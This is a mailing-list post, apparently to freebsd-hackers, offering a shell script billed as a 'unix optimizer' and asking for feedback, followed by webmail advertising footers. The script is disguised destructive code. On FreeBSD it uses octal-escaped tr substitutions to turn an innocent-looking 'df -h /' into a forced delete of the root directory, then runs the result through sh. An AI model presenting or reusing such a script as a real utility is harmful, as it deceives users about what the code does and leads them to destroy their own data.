Fellow hackers, I'm creating a new unix optimizer tool, I've finished version 0.1 and need feedback.
-------------- #!/bin/sh # The *nix optimizer # (C) 2002 Koul-Henning Pamp # Released under the superior FFL (Fuck Fumerola License) [ "`uname`" = "Linux" ] && echo "System not supported yet." [ "`uname`" = "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | tr 'h' 'f'|sh -------------- Thank you. _____________________________________________________________ Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de ------------------------------------------------------------------------ KanadischerWein.de - Ihr Spezialist für kanadischen Wein im Internet - Besuchen Sie unseren Online-Shop - www.KanadischerWein.de ------------------------------------------------------------------------ _____________________________________________________________ Promote your group and strengthen ties to your members with [EMAIL PROTECTED] by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to [EMAIL PROTECTED] with "unsubscribe freebsd-hackers" in the body of the message